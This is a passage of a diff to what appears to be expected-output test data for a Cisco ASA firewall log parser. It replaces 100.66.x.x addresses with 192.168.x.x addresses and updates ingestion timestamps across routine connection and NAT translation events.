"mapped_source_ip": "100.66.247.99", + "mapped_source_ip": "192.168.247.99", "connection_id": "11834", "source_interface": "outside", "mapped_destination_port": 1299 @@ -15332,8 +15332,8 @@ }, "destination": { "port": 8304, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1300, @@ -15373,7 +15373,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15381,8 +15381,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111974896Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304", + "ingested": "2021-12-09T13:31:36.364222800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15415,8 +15415,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15451,7 +15451,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15460,8 +15460,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111976804Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", + "ingested": "2021-12-09T13:31:36.364226600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15477,7 +15477,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11835", "source_interface": "outside", "mapped_destination_port": 1300 @@ -15499,8 +15499,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15535,7 +15535,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15546,8 +15546,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111978478Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:100.66.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", + "ingested": "2021-12-09T13:31:36.364230800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15584,8 +15584,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15620,7 +15620,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15631,8 +15631,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111980180Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:100.66.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", + "ingested": "2021-12-09T13:31:36.364257Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15664,8 +15664,8 @@ }, "destination": { "port": 8305, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1301, @@ -15705,7 +15705,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15713,8 +15713,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111981860Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305", + "ingested": "2021-12-09T13:31:36.364262300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15747,8 +15747,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15783,7 +15783,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15792,8 +15792,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111983582Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", + "ingested": "2021-12-09T13:31:36.364267800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15809,7 +15809,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11836", "source_interface": "outside", "mapped_destination_port": 1301 @@ -15826,8 +15826,8 @@ }, "destination": { "port": 8306, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1302, @@ -15867,7 +15867,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15875,8 +15875,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111985205Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306", + "ingested": "2021-12-09T13:31:36.364273200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15909,8 +15909,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15945,7 +15945,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15954,8 +15954,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111987070Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", + "ingested": "2021-12-09T13:31:36.364279300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15971,7 +15971,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11837", "source_interface": "outside", "mapped_destination_port": 1302 @@ -16009,8 +16009,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111988723Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364284100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16056,8 +16056,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111990375Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364305800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16103,8 +16103,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111992065Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364356600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16150,8 +16150,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111993775Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364361800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16197,8 +16197,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111995514Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364366Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16244,8 +16244,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111997193Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364371200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16291,8 +16291,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111998878Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364375800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16338,8 +16338,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112000603Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364380100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16385,8 +16385,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112002247Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364384800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16432,8 +16432,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112004024Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364388900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16479,8 +16479,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112005769Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364393200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16526,8 +16526,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112007456Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364398200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16573,8 +16573,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112009133Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364402900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16620,8 +16620,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112010826Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364407200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16667,8 +16667,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112012468Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364411700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16693,8 +16693,8 @@ }, "destination": { "port": 8308, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1304, @@ -16734,7 +16734,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -16742,8 +16742,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112014142Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:100.66.98.44/8308", + "ingested": "2021-12-09T13:31:36.364416800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -16776,8 +16776,8 @@ }, "source": { "port": 80, - "address": "100.66.205.99", - "ip": "100.66.205.99" + "address": "192.168.205.99", + "ip": "192.168.205.99" }, "tags": [ "preserve_original_event" @@ -16812,7 +16812,7 @@ "localhost" ], "ip": [ - "100.66.205.99", + "192.168.205.99", "172.31.98.44" ] }, @@ -16821,8 +16821,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112015960Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", + "ingested": "2021-12-09T13:31:36.364421400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -16838,7 +16838,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.205.99", + "mapped_source_ip": "192.168.205.99", "connection_id": "11840", "source_interface": "outside", "mapped_destination_port": 1304 @@ -16876,8 +16876,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112017591Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364425500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16923,8 +16923,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112019269Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364430300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16954,8 +16954,8 @@ }, "source": { "port": 53, - "address": "100.66.0.124", - "ip": "100.66.0.124" + "address": "192.168.0.124", + "ip": "192.168.0.124" }, "tags": [ "preserve_original_event" @@ -16990,7 +16990,7 @@ "localhost" ], "ip": [ - "100.66.0.124", + "192.168.0.124", "172.31.98.44" ] }, @@ -16999,8 +16999,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112020935Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:100.66.0.124/53 (100.66.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.364436400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -17016,7 +17016,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.0.124", + "mapped_source_ip": "192.168.0.124", "connection_id": "11841", "source_interface": "outside", "mapped_destination_port": 56132 @@ -17038,8 +17038,8 @@ }, "source": { "port": 53, - "address": "100.66.160.2", - "ip": "100.66.160.2" + "address": "192.168.160.2", + "ip": "192.168.160.2" }, "tags": [ "preserve_original_event" @@ -17074,7 +17074,7 @@ "localhost" ], "ip": [ - "100.66.160.2", + "192.168.160.2", "172.31.98.44" ] }, @@ -17083,8 +17083,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112022684Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:100.66.160.2/53 (100.66.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.364441600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -17100,7 +17100,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.160.2", + "mapped_source_ip": "192.168.160.2", "connection_id": "11842", "source_interface": "outside", "mapped_destination_port": 56132 @@ -17122,8 +17122,8 @@ }, "source": { "port": 53, - "address": "100.66.0.124", - "ip": "100.66.0.124" + "address": "192.168.0.124", + "ip": "192.168.0.124" }, "tags": [ "preserve_original_event" @@ -17158,7 +17158,7 @@ "localhost" ], "ip": [ - "100.66.0.124", + "192.168.0.124", "172.31.98.44" ] }, @@ -17168,8 +17168,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.112024333Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:100.66.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", + "ingested": "2021-12-09T13:31:36.364446400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -17206,8 +17206,8 @@ }, "source": { "port": 53, - "address": "100.66.160.2", - "ip": "100.66.160.2" + "address": "192.168.160.2", + "ip": "192.168.160.2" }, "tags": [ "preserve_original_event" @@ -17242,7 +17242,7 @@ "localhost" ], "ip": [ - "100.66.160.2", + "192.168.160.2", "172.31.98.44" ] }, @@ -17252,8 +17252,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.112026121Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:100.66.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:31:36.364451300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -17285,8 +17285,8 @@ }, "destination": { "port": 8309, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1305, @@ -17326,7 +17326,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -17334,8 +17334,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112027811Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:100.66.98.44/8309", + "ingested": "2021-12-09T13:31:36.364455800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -17368,8 +17368,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17404,7 +17404,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -17413,8 +17413,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112029475Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", + "ingested": "2021-12-09T13:31:36.364459500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -17430,7 +17430,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.124.24", + "mapped_source_ip": "192.168.124.24", "connection_id": "11843", "source_interface": "outside", "mapped_destination_port": 1305 @@ -17468,8 +17468,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112031140Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364464200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17515,8 +17515,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112032811Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364470200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17562,8 +17562,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112034532Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364476300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17609,8 +17609,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112036270Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364482300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17656,8 +17656,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112037910Z", - "original": "Oct 10 2018 12:34:56 localhost 